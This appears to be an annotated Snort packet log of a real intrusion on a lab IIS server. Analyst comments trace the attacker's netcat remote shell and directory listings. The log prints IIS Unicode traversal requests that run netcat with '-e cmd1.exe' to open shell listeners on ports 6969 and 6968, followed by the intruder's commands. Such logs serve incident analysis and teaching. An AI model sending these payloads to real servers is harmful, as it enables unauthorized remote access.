...........mGI.9N...S>....5...(..^...u.|.o......>?..K.......G.-4
..0.q.r..}....%.y..p....{....!...Q.G.......;.s..Og.\.J.W..Z._M.4
i!'.}......A....1....R.~..5.*..{.m..........^.[_k..qS.......O..}
.\...............c.=.....D............o........k.).Z..U...G.....
.nl.h...~......_p....^..^..........;..U...?..^..|{......g.':(...
.....+...t...,.._...L.....o.1...._H...../".&...KW...M..f........
.......O...#.'..f.)Y..)..k..v.od..M.:Yb..pZg.p...T..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:51.199970 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:27518 IpLen:20 DgmLen:135 DF
***AP*** Seq: 0x2CBF8025 Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
6J;...'.-~F...........'RGb0...&"......x..._1.#....<.....8N.P.p..
....K.'.....;.~..u.....Ob{z."..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:51.201340 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:27774 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0x2CBF8084 Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
.N....h........\....)..\.`.....k..M......=..?.....L........mV.K.
..}.1.....+....[UC...7.=e.._:5.v........c;......kv0...`s..).5...
.u.)....c....c|M..D....Lq.%..q.5..T...k.[........8.1^..u.......u
.....%n1...=nQ..j.......+h....C]<0...ck.G...4....Oh.c...3.d..*]N
.r....~.glq..^....e...1....d.....(.vb.rM\........j.w...7....;...
6....~u:ZY.f.?...k..G........mPK..z........=S?`.=..o8.....l_A.".
:..M;..N[.Jy.....[.& ._T|.I...$..OL.c..E,...X.U.yp0.o.
s6.4..~.2v..`...v....W...g.y.}........A..W].#]..*:..w.v>.D,.....
..r.F=.^...>.........Q.......+......~"My.>Y...Uu..Z~.R...k....K.
_...w+..!...q!|Bmur~...Mh.1.s~K..N.=.f.-./..i7..]..\..V.....Aq..
......4.gY..U.nQ....q.o..?....T.*....q".a.">...s....a.9~....)...
c.t~5'..k..^...%N&..|...............F...z../9............h..e...
.....n..?.8..D..t.....b%.~.A....\FC...|...?.V.`..P......&.].\c..
..pO....|.XN...m..<........r....4..%.....V.....22...!.>.*.9...z.
.....8.L.3<..y.}...,....../...4p.p...@.'..7..I'3..._...%........
?l..V.......F...[.[...F{...z.9.!%.L.$....60Z....T.!.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:51.201354 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:28030 IpLen:20 DgmLen:184 DF
***AP*** Seq: 0x2CBF8638 Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
k.0...a6F.h>...Oh...va.I...Cr\U..k...4.......`&.....mbe....E....
W:......3.h.mr...d>nj...W.........)........x...u.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:51.542517 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:28286 IpLen:20 DgmLen:628 DF
***AP*** Seq: 0x2CBF86C8 Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
......1....P(..+......`...O.c>2...q..C......Jk....m.....K...;B..
.]..0.C.....n......2Xo......T....u...lQ|...j..ee:.];...r...YAp.=
.......vuE...2......)X.H.i...z.M.S.I..N.;...{........zz.9..z...z
.....R..Ov... .[.........`4....3.[H).''.L0x........y.zM.r...>P..
..F.=......>K....zH'.o.z}......T=....>N{W....AM..G...Q...ye._.u.
.......>...G;....o*....`7._:.........`l............@.CNB&..g.q.S
....#~.#..!.}.GZ!.@..\.$..9.y.rM.....
L.........~.e!.A&?.. ' .A.y..... ..B.......:.. .......9.^..8df_.
....yB..d...{9..d.T......Y....1".7.6.k..K..eP.M...x..o8.._...2..
..C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:09:54.655927 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32126 IpLen:20 DgmLen:166 DF
***AP*** Seq: 0x2CBF8914 Ack: 0x9E440202 Win: 0x2104 TcpLen: 20
......dir..The name specified is not recognized as an..internal
or external command, operable program or batch file.....C:\>..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:09:55.049853 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32382 IpLen:20 DgmLen:44 DF
***AP*** Seq: 0x2CBF8992 Ack: 0x9E440205 Win: 0x2101 TcpLen: 20
C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:09:57.274488 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:33150 IpLen:20 DgmLen:170 DF
***AP*** Seq: 0x2CBF8996 Ack: 0x9E44020D Win: 0x20F9 TcpLen: 20
......dir..The name specified is not recognized as an..internal
or external command, operable program or batch file.....C:\>..C:
\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:10:03.619072 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:35454 IpLen:20 DgmLen:178 DF
***AP*** Seq: 0x2CBF8A18 Ack: 0x9E440220 Win: 0x20E6 TcpLen: 20
......cd wiretrip..The name specified is not recognized as an..i
nternal or external command, operable program or batch file.....
C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:10:08.225729 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37758 IpLen:20 DgmLen:174 DF
***AP*** Seq: 0x2CBF8AA2 Ack: 0x9E44022F Win: 0x20D7 TcpLen: 20
......exit.....The name specified is not recognized as an..inter
nal or external command, operable program or batch file.....C:\>
..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:10:10.128556 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38782 IpLen:20 DgmLen:171 DF
***AP*** Seq: 0x2CBF8B28 Ack: 0x9E44023B Win: 0x20CB TcpLen: 20
......exit..The name specified is not recognized as an..internal
or external command, operable program or batch file.....C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Original remote shell on port 6969 disconnects
!@# Uses Unicode vulnerability to start a new nc listner on port 6969
[**] Resrticted http-iis-unicode-binary [**]
02/04-06:10:42.651430 213.116.251.162:1987 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13866 IpLen:20 DgmLen:502 DF
***AP*** Seq: 0xB7662FA6 Ack: 0x2CD820AB Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HT
TP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image/pj
peg, application/vnd.ms-excel, application/msword, application/v
nd.ms-powerpoint, */*..Accept-Language: en-us..Accept-Encoding:
gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; W
indows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection:
Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses Unicode vulnerability to start a new nc listner on port 6968
[**] Resrticted http-iis-unicode-binary [**]
02/04-06:11:19.684228 213.116.251.162:1992 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13982 IpLen:20 DgmLen:502 DF
***AP*** Seq: 0xB7E599D6 Ack: 0x2CD8A44C Win: 0x1DF6 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6968+-e+cmd1.exe HT
TP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image/pj
peg, application/vnd.ms-excel, application/msword, application/v
nd.ms-powerpoint, */*..Accept-Language: en-us..Accept-Encoding:
gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; W
indows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection:
Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Intruder connects to listner on port 6968
[**] netcat session 6968 [**]
02/04-06:11:24.497961 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:52350 IpLen:20 DgmLen:155 DF
***AP*** Seq: 0x2CD8D444 Ack: 0xB8197A7A Win: 0x2238 TcpLen: 20
Microsoft(R) Windows NT(TM)..(C) Copyright 1985-1996 Microsoft C
orp.....C:\Program Files\Common Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6968 [**]
02/04-06:11:26.307841 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:52862 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CD8D4B7 Ack: 0xB8197A7F Win: 0x2233 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\system\
msadc....02/04/01 07:04a ...02/04/01 07:
04a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6968 [**]
02/04-06:11:26.850930 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:53118 IpLen:20 DgmLen:810 DF
***AP*** Seq: 0x2CD8D57F Ack: 0xB8197A7F Win: 0x2233 TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..09/25/97 08:28a
172,816 msadce.dll..09/25/97 08:16a
5,632 msadcer.dll..09/25/97 08:24a 23,312 msa
dcf.dll..09/25/97 08:24a 91,408 msadco.dll..09/2
5/97 08:19a 5,120 msadcor.dll..09/26/97 08:19a
42,256 msadcs.dll..02/04/01 06:41a
59,392 nc.exe..10/02/97 07:28a 19,388 readme.
txt.. 13 File(s) 628,653 bytes..
1,690,259,968 bytes free....C:\Program Files\Commo
n Files\system\msadc>..C:\Program Files\Common Files\system\msad
c>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6968 [**]
02/04-06:11:29.909437 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:54654 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CD8D881 Ack: 0xB8197A8C Win: 0x2226 TcpLen: 20
net session..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries 'net session' from new remote shell, but access is still denied.
[**] netcat session 6968 [**]
02/04-06:11:30.378043 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:54910 IpLen:20 DgmLen:185 DF
***AP*** Seq: 0x2CD8D88E Ack: 0xB8197A8C Win: 0x2226 TcpLen: 20
System error 5 has occurred......Access is denied........C:\Prog
ram Files\Common Files\system\msadc>..C:\Program Files\Common Fi
les\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6968 [**]
02/04-06:11:32.959720 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:55678 IpLen:20 DgmLen:57 DF
***AP*** Seq: 0x2CD8D91F Ack: 0xB8197A91 Win: 0x2221 TcpLen: 20
cd\....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6968 [**]
02/04-06:11:34.161858 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:56190 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CD8D930 Ack: 0xB8197A96 Win: 0x221C TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6968 [**]
02/04-06:11:34.677005 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:56446 IpLen:20 DgmLen:807 DF
***AP*** Seq: 0x2CD8D9F8 Ack: 0xB8197A96 Win: 0x221C TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p